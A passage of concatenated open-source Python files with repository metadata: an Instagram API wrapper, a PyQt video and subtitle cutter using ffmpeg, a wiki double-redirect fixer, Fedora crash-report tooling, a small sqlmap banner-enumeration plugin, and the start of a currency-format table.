An InputSet with methods appropriate for specifying the inputs to the RecentlyTaggedMedia
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((conditional, string) The access token retrieved during the OAuth 2.0 process. Required unless you provide the ClientID.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Instagram after registering your application. Required unless you provide the AccessToken.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('ClientID', value)
def set_Count(self, value):
"""
Set the value of the Count input for this Choreo. ((optional, integer) The number of results to return.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('Count', value)
def set_MaxID(self, value):
"""
Set the value of the MaxID input for this Choreo. ((optional, integer) Returns media tagged earlier than this max_tag_id. Used to paginate through results.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('MaxID', value)
def set_MinID(self, value):
"""
        Set the value of the MinID input for this Choreo. ((optional, integer) Returns media tagged later than this min_tag_id. Used to paginate through results.)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('MinID', value)
def set_TagName(self, value):
"""
        Set the value of the TagName input for this Choreo. ((required, string) Enter a valid tag identifier, such as: nofilter)
"""
super(RecentlyTaggedMediaInputSet, self)._set_input('TagName', value)
class RecentlyTaggedMediaResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the RecentlyTaggedMedia Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Instagram.)
"""
return self._output.get('Response', None)
class RecentlyTaggedMediaChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return RecentlyTaggedMediaResultSet(response, path)
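# A minimal usage sketch (requires a valid TembooSession; values illustrative):
#   choreo = RecentlyTaggedMedia(session)
#   inputs = choreo.new_input_set()
#   inputs.set_ClientID('YOUR_CLIENT_ID')
#   inputs.set_TagName('sunset')
#   results = choreo.execute_with_results(inputs)
#   response = results.getJSONFromString(results.get_Response())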
|
jordanemedlock/psychtruths
|
temboo/core/Library/Instagram/RecentlyTaggedMedia.py
|
Python
|
apache-2.0
| 4,513
|
import logging
import os
import subprocess
import sys
import shutil
import pkg_resources
import datetime as dt
from pathlib import Path
import pysrt
from PyQt5 import QtCore, QtWidgets, QtGui
from PyQt5.QtWidgets import QLabel, QPushButton, QMessageBox
from quickcut.ordered_set import OrderedSet
from quickcut.widgets import Picker, MinuteSecondEdit, BiggerMessageBox
"""
Uses ffmpeg - http://manpages.ubuntu.com/manpages/vivid/en/man1/ffmpeg.1.html
http://ffmpeg.org/ffmpeg.html#Stream-selection
See also PyAV: https://github.com/mikeboers/PyAV
"""
__author__ = 'Edward Oubrayrie'
try:
__version__ = pkg_resources.get_distribution(Path(__file__).parent.name).version
except pkg_resources.DistributionNotFound:
__version__ = '0.DEV'
ICON = pkg_resources.resource_filename('quickcut', 'quickcut.png')
logger = logging.getLogger(__name__)
def packagekit_install(pack='ffmpeg'):
"""
Equivalent of:
qdbus org.freedesktop.PackageKit /org/freedesktop/PackageKit
org.freedesktop.PackageKit.Modify.InstallPackageNames
0 ffmpeg "show-confirm-search,hide-finished"
Or:
qdbus org.freedesktop.PackageKit /org/freedesktop/PackageKit
org.freedesktop.PackageKit.Query.IsInstalled 0 ffmpeg
See also (dbus) http://www.freedesktop.org/software/PackageKit/pk-faq.html#session-methods
Doc: http://blog.fpmurphy.com/2013/11/packagekit-d-bus-abstraction-layer.html
"""
from PyQt5.QtDBus import QDBusConnection
from PyQt5.QtDBus import QDBusInterface
bus = QDBusConnection.sessionBus()
service_name = 'org.freedesktop.PackageKit'
service_path = '/org/freedesktop/PackageKit'
interface = 'org.freedesktop.PackageKit.Query.IsInstalled'
install = QDBusInterface(service_name, service_path, interface, bus)
reply = install.call(0, pack, 'show-confirm-search,hide-finished')
print(reply.arguments())
interface = 'org.freedesktop.PackageKit.Modify.InstallPackageNames'
install = QDBusInterface(service_name, service_path, interface, bus)
reply = install.call(0, pack, 'show-confirm-search,hide-finished')
print(reply.arguments())
def duration(start: dt.time, stop: dt.time) -> dt.timedelta:
return dt.datetime.combine(dt.date.min, stop) - dt.datetime.combine(dt.date.min, start)
def timedelta_str(d: dt.timedelta) -> str:
assert (d.days == 0)
hours, remainder = divmod(d.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
return '%02d:%02d:%02d' % (hours, minutes, seconds)
def duration_str(h_m_s_start: [int, int, int], h_m_s_stop: [int, int, int]):
return timedelta_str(duration(dt.time(*h_m_s_start), dt.time(*h_m_s_stop)))
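# Worked example: duration_str([0, 1, 30], [0, 3, 45]) == '00:02:15'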
def video_cut(vid_in, vid_out, ss, to, d, alt_audio, parent):
# input validation:
if os.path.isfile(vid_out):
# QMessageBox(icon, '{} already exists', 'Do you want to replace it ?',
# buttons=QMessageBox.Yes, parent=parent)
msg = '{} already exists\n\nDo you want to replace it ?'.format(vid_out)
video_ret = QMessageBox.warning(parent, 'File exists', msg, defaultButton=QMessageBox.Cancel)
if video_ret == QMessageBox.Cancel:
return
try:
os.remove(vid_out)
except OSError as e:
            msg = 'Cannot write {}, system returned {}.\n\n' \
                  'Change the output file name and retry.'.format(vid_out, str(e))
QMessageBox.critical(parent, 'Wrong file', msg)
return None
video_ret = 0
if os.path.isfile(vid_in):
ffmpeg = shutil.which('ffmpeg')
avconv = shutil.which('avconv')
exe = ffmpeg or avconv
if not exe:
msg = 'Install ffmpeg or avconv'
QMessageBox.critical(parent, 'Missing dependency', msg)
return
if exe == avconv: # end_as_duration:
stop = ['-t', d]
else:
stop = ['-to', to]
        command = [exe, '-nostdin', '-noaccurate_seek',
'-i', vid_in,
'-ss', ss,
stop[0], stop[1],
'-vcodec', 'copy',
'-acodec', 'copy',
'-map', '0', # all streams
]
if alt_audio:
command.extend(['-map', '-0:a:0']) # remove main audio stream
command.append(vid_out)
# "ffmpeg -i input.avi -vcodec copy -acodec copy -ss 00:00:00 -t 00:05:00 output1.avi"
# 'avconv -i "/media/eoubrayrie/STORENGO/v.mp4" -vcodec copy -acodec copy -ss 00:00:00 -t 00:05:16 output1.avi'
logger.info('%s', command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, stderr=subprocess.STDOUT)
stdout, stderr = p.communicate()
video_ret = p.poll()
if video_ret != 0:
msg = "Error {:d} occured. Check video file or see details.".format(video_ret)
dmsg = "\n\n{}\n\n{}\n\n{}".format(stdout.decode(), '_' * 30, stderr.decode())
err_dialog = BiggerMessageBox(QMessageBox.Critical, 'Error during video cut', msg, parent=parent)
err_dialog.setDetailedText(dmsg)
err_dialog.exec()
return video_ret
def subtitle_cut(h1, m1, s1, h2, m2, s2, subs, sbt_out):
print('Decoded {} with {} items'.format(sbt_out, len(subs)))
part = subs.slice(starts_after={'hours': h1, 'minutes': m1, 'seconds': s1},
ends_before={'hours': h2, 'minutes': m2, 'seconds': s2})
# d = - duration(dt.time(h1, m1, s1), dt.time(h2, m2, s2)).total_seconds()
print('Shifting {} sliced items'.format(len(part)))
part.shift(hours=-h1, minutes=-m1, seconds=-s1)
part.save(path=sbt_out)
print('Successfully written', sbt_out)
class Main(QtWidgets.QWidget):
def __init__(self):
super(Main, self).__init__()
# File Picker
self.video_pick = Picker('Open video', filters='Videos (*.mp4 *.mpg *.avi);;All files (*.*)')
self.subtitle_pick = Picker('Open subtitle', filters='SubRip Subtitles (*.srt);;All files (*.*)')
self.save_pick = Picker('Save as', check_exists=False, check_writable=True)
# Times
self.start = MinuteSecondEdit(self)
self.stop = MinuteSecondEdit(self)
self.alt_audio = QtWidgets.QCheckBox('Alternate audio track', self)
icon_ok = self.style().standardIcon(QtWidgets.QStyle.SP_DialogOkButton)
self.ok_btn = QPushButton(icon_ok, 'Do it !', self)
self.init()
def init(self):
# events
self.video_pick.textChanged.connect(self.video_changed)
for w in (self.video_pick, self.subtitle_pick, self.start, self.stop, self.save_pick):
w.textChanged.connect(self.doit_controller)
# times
times = QtWidgets.QHBoxLayout()
times.addWidget(self.start)
times.addWidget(self.stop)
times.addStretch(1)
# Buttons
self.ok_btn.setEnabled(False)
self.ok_btn.clicked.connect(self.do_it)
icon_quit = self.style().standardIcon(QtWidgets.QStyle.SP_DialogCancelButton)
quit_btn = QPushButton(icon_quit, 'Quit', self)
quit_btn.clicked.connect(exit)
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(self.alt_audio)
hbox.addStretch(1)
hbox.addWidget(self.ok_btn)
hbox.addWidget(quit_btn)
# Stitch it
# vbox = QtWidgets.QVBoxLayout()
grid = QtWidgets.QGridLayout()
grid.setSpacing(10)
grid.addWidget(QLabel('Video:'), 1, 0)
grid.addWidget(self.video_pick, 1, 1)
grid.addWidget(QLabel('Subtitles:'), 2, 0)
grid.addWidget(self.subtitle_pick, 2, 1)
grid.addWidget(QLabel('Start / Stop (HHMMSS):'), 3, 0)
grid.addLayout(times, 3, 1)
grid.addWidget(QLabel('Output:'), 4, 0)
grid.addWidget(self.save_pick, 4, 1)
# grid.addStretch(1)
grid.addLayout(hbox, 5, 1)
self.setLayout(grid)
# noinspection PyUnusedLocal
@QtCore.pyqtSlot()
def video_changed(self, *args, **kw):
p = self.video_pick.get_text()
if p:
self.subtitle_pick.set_text(str(Path(p).with_suffix('.srt')))
# noinspection PyUnusedLocal
@QtCore.pyqtSlot()
def doit_controller(self, *args, **kw):
ok = lambda w: w.hasAcceptableInput()
self.ok_btn.setEnabled((ok(self.video_pick) or ok(self.subtitle_pick)) and
ok(self.start) and ok(self.stop) and ok(self.save_pick))
def do_it(self):
vid_in = self.video_pick.get_text()
vid_out = self.save_pick.get_text() + os.path.splitext(vid_in)[1]
ss = self.start.get_time()
to = self.stop.get_time()
d = duration_str(self.start.get_h_m_s(), self.stop.get_h_m_s())
alt_audio = self.alt_audio.isChecked()
video_ret = video_cut(vid_in, vid_out, ss, to, d, alt_audio, self)
if video_ret == 0:
sbt_out = self.cut_subtitle()
opn = shutil.which('xdg-open')
if vid_out and os.path.isfile(vid_out):
f = vid_out
elif sbt_out and os.path.isfile(sbt_out):
f = sbt_out
else: # This should not happen as button is greyed out
                msg = 'Neither a video nor a subtitle output file was written.'
                QMessageBox.warning(self, 'No file was generated', msg, defaultButton=QMessageBox.NoButton)
return
if opn:
subprocess.Popen([opn, f])
def cut_subtitle(self):
sbt_in = self.subtitle_pick.get_text()
if os.path.isfile(sbt_in):
sbt_out = self.save_pick.get_text() + os.path.splitext(sbt_in)[1]
h1, m1, s1 = self.start.get_h_m_s()
h2, m2, s2 = self.stop.get_h_m_s()
import chardet
detected = chardet.detect(open(sbt_in, 'rb').read(1024*1024))
enc = detected['encoding']
cnf = detected['confidence']
e = None
encs = OrderedSet([enc, 'utf-8', 'latin1'])
for encoding in encs:
try:
logger.info('Trying to open subtitle with encoding %s' % encoding)
subs = pysrt.open(sbt_in, error_handling=pysrt.ERROR_LOG, encoding=encoding)
subtitle_cut(h1, m1, s1, h2, m2, s2, subs, sbt_out)
return
except Exception as ae:
e = e or ae
logger.warning('encoding %s failed', encoding, exc_info=1)
msg = "Could not open {} with any of the following encodings:\n {}\n\n" \
"Confidence on {} was {}.\nFirst error was: {}"
msg = msg.format(os.path.basename(sbt_in), ', '.join(encs), enc, cnf, str(e))
QMessageBox.warning(self, 'Opening subtitle failed', msg, defaultButton=QMessageBox.NoButton)
return sbt_out
def main():
app = QtWidgets.QApplication(sys.argv)
# for path in QtGui.QIcon.themeSearchPaths():
# print("%s/%s" % (path, QtGui.QIcon.themeName()))
icon = QtGui.QIcon()
# icon.addPixmap(QtGui.QPixmap(":/icons/hicolor/128x128/apps/quickcut.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap(ICON), QtGui.QIcon.Normal, QtGui.QIcon.Off)
app.setWindowIcon(icon)
w = Main()
# Set window size.
# screen = QDesktopWidget().screenGeometry()
# w.setGeometry(0, 0, screen.width(), screen.height())
# w.showMaximized()
w.normalGeometry()
# Set window title
w.setWindowTitle("QuickCut")
# Show window
w.show()
sys.exit(app.exec())
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
eddy-geek/quickcut
|
quickcut/__init__.py
|
Python
|
gpl-2.0
| 11,720
|
#! /usr/bin/env python3
import logging
import mwparserfromhell
from ws.client import API
from ws.parser_helpers.wikicode import is_redirect
logger = logging.getLogger(__name__)
class DoubleRedirects:
edit_summary = "fix double redirect"
def __init__(self, api):
self.api = api
def update_redirect_page(self, page, target):
title = page["title"]
text_old = page["revisions"][0]["slots"]["main"]["*"]
timestamp = page["revisions"][0]["timestamp"]
if not is_redirect(text_old, full_match=True):
logger.error("Double redirect page '{}' is not empty, so it cannot be fixed automatically.".format(title))
return
logger.info("Parsing '{}'...".format(title))
wikicode = mwparserfromhell.parse(text_old)
# asserted by the regex match above
assert(len(wikicode.nodes) == 3)
assert(isinstance(wikicode.nodes[2], mwparserfromhell.nodes.wikilink.Wikilink))
wl_target = wikicode.nodes[2]
wl_target.title = target
wl_target.text = None
text_new = str(wikicode)
# also add Category:Archive to the redirect
if target.startswith("ArchWiki:Archive"):
text_new = text_new.rstrip() + "\n[[Category:Archive]]"
if text_old != text_new:
self.api.edit(title, page["pageid"], text_new, timestamp, self.edit_summary, bot="")
def findall(self):
double = {}
for source, target in self.api.redirects.map.items():
target = target.split("#", maxsplit=1)[0]
if target in self.api.redirects.map:
double[source] = target
return double
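    # For example, if "A" redirects to "B" and "B" redirects to "C", the
    # redirect map contains {"A": "B", "B": "C"} and findall() returns
    # {"A": "B"}.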
def fixall(self):
double = self.findall()
if not double:
logger.info("There are no double redirects.")
return
# fetch all revisions at once
result = self.api.call_api(action="query", titles="|".join(double.keys()), prop="revisions", rvprop="content|timestamp", rvslots="main")
pages = result["pages"]
for page in pages.values():
source = page["title"]
target = self.api.redirects.resolve(source)
if target:
self.update_redirect_page(page, target)
if __name__ == "__main__":
import ws.config
api = ws.config.object_from_argparser(API, description="Fix double redirects")
dr = DoubleRedirects(api)
dr.fixall()
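
# Hedged illustration (not part of the script): how findall() pairs up double
# redirects given a plain {source: target} mapping like api.redirects.map.
# Section anchors are stripped before the lookup, exactly as above.
def _demo_findall(redirect_map):
    double = {}
    for source, target in redirect_map.items():
        target = target.split("#", maxsplit=1)[0]
        if target in redirect_map:
            double[source] = target
    return double

# _demo_findall({"A": "B", "B": "C"}) == {"A": "B"}  # "B" is itself a redirect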
|
lahwaacz/wiki-scripts
|
fix-double-redirects.py
|
Python
|
gpl-3.0
| 2,435
|
# Copyright (C) 2013 ABRT Team
# Copyright (C) 2013 Red Hat, Inc.
#
# This file is part of faf.
#
# faf is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# faf is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with faf. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from typing import Dict, List, Union
from datetime import datetime
import fnmatch
import json
from urllib.error import HTTPError
from urllib.request import urlopen
import koji
from pyfaf.opsys import System
from pyfaf.checker import DictChecker, IntChecker, ListChecker, StringChecker
from pyfaf.common import FafError, log
from pyfaf.queries import (get_arch_by_name,
get_opsys_by_name,
get_osrelease,
get_package_by_nevra,
get_reportpackage,
get_report_release_desktop,
get_unknown_package)
from pyfaf.storage import (Arch,
Build,
OpSys,
Package,
ReportReleaseDesktop,
ReportPackage,
ReportUnknownPackage,
column_len)
from pyfaf.utils.parse import str2bool, words2list
from pyfaf.storage.custom_types import to_semver
__all__ = ["Fedora"]
class Fedora(System):
name = "fedora"
nice_name = "Fedora"
packages_checker = ListChecker(
DictChecker({
"name": StringChecker(pattern=r"^[a-zA-Z0-9_\-\.\+~]+$",
maxlen=column_len(Package,
"name")),
"epoch": IntChecker(minval=0),
"version": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+~]+$",
maxlen=column_len(Build, "version")),
"release": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+]+$",
maxlen=column_len(Build, "release")),
"architecture": StringChecker(pattern=r"^[a-zA-Z0-9_]+$",
maxlen=column_len(Arch, "name")),
}), minlen=0
)
ureport_checker = DictChecker({
# no need to check name, version and architecture twice
# the toplevel checker already did it
# "name": StringChecker(allowed=[Fedora.name])
# "version": StringChecker()
# "architecture": StringChecker()
"desktop": StringChecker(mandatory=False, pattern=r"^[a-zA-Z0-9_/-]+$",
maxlen=column_len(ReportReleaseDesktop,
"desktop"))
})
pkg_roles = ["affected", "related", "selinux_policy"]
@classmethod
def install(cls, db, logger=None) -> None:
if logger is None:
logger = log.getChild(cls.__name__)
logger.info("Adding Fedora operating system")
new = OpSys()
new.name = cls.nice_name
db.session.add(new)
db.session.flush()
@classmethod
def installed(cls, db) -> bool:
return bool(get_opsys_by_name(db, cls.nice_name))
def __init__(self) -> None:
super().__init__()
self.eol = None
self.pdc_url = None
self.pagure_url = None
self.build_aging_days = None
self.koji_url = None
self.ignored_releases = []
self.allow_unpackaged = None
self.load_config_to_self("eol", ["fedora.supporteol"],
False, callback=str2bool)
self.load_config_to_self("pdc_url", ["fedora.fedorapdc"],
"https://pdc.fedoraproject.org/rest_api/v1/")
self.load_config_to_self("pagure_url", ["fedora.pagureapi"],
"https://src.fedoraproject.org/api/0/")
self.load_config_to_self("build_aging_days",
["fedora.build-aging-days"],
7, callback=int)
self.load_config_to_self("koji_url",
["fedora.koji-url"], None)
self.load_config_to_self("ignored_releases",
["fedora.ignored-releases"], [],
callback=words2list)
self.load_config_to_self("allow_unpackaged",
["ureport.allow-unpackaged"], False,
callback=str2bool)
def _save_packages(self, db, db_report, packages, count=1) -> None:
for package in packages:
role = "RELATED"
if "package_role" in package:
if package["package_role"] == "affected":
role = "CRASHED"
elif package["package_role"] == "selinux_policy":
role = "SELINUX_POLICY"
db_package = get_package_by_nevra(db,
name=package["name"],
epoch=package["epoch"],
version=package["version"],
release=package["release"],
arch=package["architecture"])
if db_package is None:
self.log_warn("Package {0}-{1}:{2}-{3}.{4} not found in "
"storage".format(package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"]))
db_unknown_pkg = get_unknown_package(db,
db_report,
role,
package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"])
if db_unknown_pkg is None:
db_arch = get_arch_by_name(db, package["architecture"])
if db_arch is None:
continue
db_unknown_pkg = ReportUnknownPackage()
db_unknown_pkg.report = db_report
db_unknown_pkg.name = package["name"]
db_unknown_pkg.epoch = package["epoch"]
db_unknown_pkg.version = package["version"]
db_unknown_pkg.release = package["release"]
db_unknown_pkg.semver = to_semver(package["version"])
db_unknown_pkg.semrel = to_semver(package["release"])
db_unknown_pkg.arch = db_arch
db_unknown_pkg.type = role
db_unknown_pkg.count = 0
db.session.add(db_unknown_pkg)
db_unknown_pkg.count += count
continue
db_reportpackage = get_reportpackage(db, db_report, db_package)
if db_reportpackage is None:
db_reportpackage = ReportPackage()
db_reportpackage.report = db_report
db_reportpackage.installed_package = db_package
db_reportpackage.count = 0
db_reportpackage.type = role
db.session.add(db_reportpackage)
db_reportpackage.count += count
def validate_ureport(self, ureport) -> bool:
Fedora.ureport_checker.check(ureport)
return True
def validate_packages(self, packages) -> bool:
affected = False
Fedora.packages_checker.check(packages)
for package in packages:
if "package_role" in package:
if package["package_role"] not in Fedora.pkg_roles:
raise FafError("Only the following package roles are allowed: "
"{0}".format(", ".join(Fedora.pkg_roles)))
if package["package_role"] == "affected":
affected = True
if not (affected or self.allow_unpackaged):
raise FafError("uReport must contain affected package")
return True
def save_ureport(self, db, db_report, ureport, packages, flush=False, count=1) -> None:
if "desktop" in ureport:
db_release = get_osrelease(db, Fedora.nice_name, ureport["version"])
if db_release is None:
self.log_warn("Release '{0} {1}' not found"
.format(Fedora.nice_name, ureport["version"]))
else:
db_reldesktop = get_report_release_desktop(db, db_report,
db_release,
ureport["desktop"])
if db_reldesktop is None:
db_reldesktop = ReportReleaseDesktop()
db_reldesktop.report = db_report
db_reldesktop.release = db_release
db_reldesktop.desktop = ureport["desktop"]
db_reldesktop.count = 0
db.session.add(db_reldesktop)
db_reldesktop.count += count
self._save_packages(db, db_report, packages, count=count)
if flush:
db.session.flush()
def get_releases(self) -> Dict[str, Dict[str, str]]:
result = {}
        # A page size of -1 means that all results are returned on a single page
url = f"{self.pdc_url}releases/?page_size=-1&short={Fedora.name}"
with urlopen(url) as response:
releases = json.load(response)
for release in releases:
ver = release["version"].lower()
            # only accept numeric Fedora versions (or rawhide)
if not ver.isdecimal() and ver != "rawhide":
continue
# Only accept GA releases, i.e. skip updates and updates-testing
# pseudo-releases. Moreover check for specifically ignored releases.
if release.get("release_type") != "ga" or self._is_ignored(ver):
continue
result[ver] = {"status": "ACTIVE" if release["active"] else "EOL"}
return result
def get_components(self, release) -> List[str]:
branch = self._release_to_branch(release)
result = []
url = (f"{self.pdc_url}component-branches/?name={branch}&page_size=-1"
"&fields=global_component&type=rpm")
with urlopen(url) as response:
components = json.load(response)
for item in components:
result.append(item["global_component"])
return result
def get_component_acls(self, component) -> Dict[str, Dict[str, bool]]:
result: Dict[str, Dict[str, bool]] = {}
url = f"{self.pagure_url}/rpms/{component}"
try:
with urlopen(url) as response:
acls = json.load(response)
except HTTPError as ex:
self.log_error("Unable to get package information for component '%s': %s\n\tURL: %s",
component, str(ex), url)
return result
for user_g in acls["access_users"]:
for user in acls["access_users"][user_g]:
result[user] = {"commit": True, "watchbugzilla": False}
# Check for watchers
url += "/watchers"
try:
with urlopen(url) as response:
watchers = json.load(response)
except HTTPError as ex:
self.log_error("Unable to get watchers for component '%s': %s\n\tURL: %s",
component, str(ex), url)
return result
for user in watchers["watchers"]:
if user in result.keys():
result[user]["watchbugzilla"] = True
else:
result[user] = {"commit": False, "watchbugzilla": True}
return result
def get_build_candidates(self, db) -> List[Build]:
return (db.session.query(Build)
.filter(Build.release.like("%%.fc%%"))
.all())
def check_pkgname_match(self, packages, parser) -> bool:
for package in packages:
if (not "package_role" in package or
package["package_role"].lower() != "affected"):
continue
nvra = "{0}-{1}-{2}.{3}".format(package["name"],
package["version"],
package["release"],
package["architecture"])
match = parser.match(nvra)
if match is not None:
return True
return False
def _release_to_branch(self, release) -> str:
"""
Convert faf's release to branch name
"""
if not isinstance(release, str):
release = str(release)
if release.lower() == "rawhide":
branch = "rawhide"
elif release.isdigit():
int_release = int(release)
if int_release < 6:
branch = "FC-{0}".format(int_release)
elif int_release == 6:
branch = "fc{0}".format(int_release)
else:
branch = "f{0}".format(int_release)
else:
raise FafError("{0} is not a valid Fedora version".format(release))
return branch
def get_released_builds(self, release) -> List[Dict[str, Union[str, int, datetime]]]:
session = koji.ClientSession(self.koji_url)
builds_release = session.listTagged(tag="f{0}".format(release),
inherit=False)
builds_updates = session.listTagged(tag="f{0}-updates".format(release),
inherit=False)
return [{"name": b["name"],
"epoch": b["epoch"] if b["epoch"] is not None else 0,
"version": b["version"],
"release": b["release"],
"nvr": b["nvr"],
"completion_time": datetime.strptime(b["completion_time"],
"%Y-%m-%d %H:%M:%S.%f")
} for b in sorted(builds_release+builds_updates,
key=lambda b: b["completion_time"],
reverse=True)]
def _is_ignored(self, ver) -> bool:
"""
Check if the release version matches any of the glob-like patterns specified
in the configuration option 'ignored-releases'.
"""
for pattern in self.ignored_releases:
if fnmatch.fnmatchcase(ver, pattern):
return True
return False
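
# Hedged illustration (not part of faf): the fnmatch semantics _is_ignored()
# relies on, shown with made-up version strings and patterns.
def _demo_ignored_release_matching():
    assert fnmatch.fnmatchcase("34", "3?")        # '?' matches one character
    assert fnmatch.fnmatchcase("rawhide", "raw*")  # '*' matches any run
    assert not fnmatch.fnmatchcase("35", "36")     # literals must match exactly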
|
abrt/faf
|
src/pyfaf/opsys/fedora.py
|
Python
|
gpl-3.0
| 15,625
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.request import inject
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)
def getBanner(self):
if not conf.getBanner:
return
if kb.data.banner is None:
infoMsg = "fetching banner"
logger.info(infoMsg)
query = queries[Backend.getIdentifiedDbms()].banner.query
kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
return kb.data.banner
|
golismero/golismero
|
tools/sqlmap/plugins/dbms/hsqldb/enumeration.py
|
Python
|
gpl-2.0
| 940
|
# -*- coding: utf-8 -*-
SYMBOL = 'symbol'
POSITIVE_FORMAT = 'positive_format'
NEGATIVE_FORMAT = 'negative_format'
DECIMAL_SYMBOL = 'decimal_symbol'
DIGIT_GROUP_SYMBOL = 'digit_group_symbol'
GROUP_DIGITS = 'group_digits'
CURRENCIES = {
'AED': {
SYMBOL: u'د.إ.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'United Arab Emirates dirham',
'countries': ['United Arab Emirates', 'AE'],
},
'AFN': {
SYMBOL: u'؋',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Afghan afghani',
'countries': ['AF']
},
'ALL': {
SYMBOL: u'Lek',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Albanian lek',
'countries': ['AL']
},
'AMD': {
SYMBOL: u'դր.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Armenian dram',
'countries': ['AM']
},
'ANG': {
'name': 'Netherlands Antillean guilder',
SYMBOL: u'ƒ',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'countries': ['Curaçao, Sint Maarten']
},
'AOA': {
'name': 'Angolan kwanza',
SYMBOL: u'Kz',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'countries': ['Angola', 'AO']
},
'ARS': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Argentine peso',
'countries': ['AR']
},
'AUD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Australian dollar',
'countries': ['AU']
},
'AWG': {
'name': 'Aruban florin',
SYMBOL: u'ƒ',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'countries': ['Aruba', 'AW']
},
'AZN': {
SYMBOL: u'ман.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Azerbaijani manat',
'countries': ['Azerbaijan', 'AZ']
},
'BAM': {
SYMBOL: u'КМ',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Bosnia and Herzegovina convertible mark',
'countries': ['BA', 'HR']
},
'BBD': {
'name': 'Barbados dollar',
SYMBOL: u'Bds$',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'countries': ['Barbados', 'BB']
},
'BDT': {
SYMBOL: u'৳',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Bangladeshi taka',
'countries': ['BD']
},
'BGN': {
SYMBOL: u'лв',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Bulgarian lev',
'countries': ['BG']
},
'BHD': {
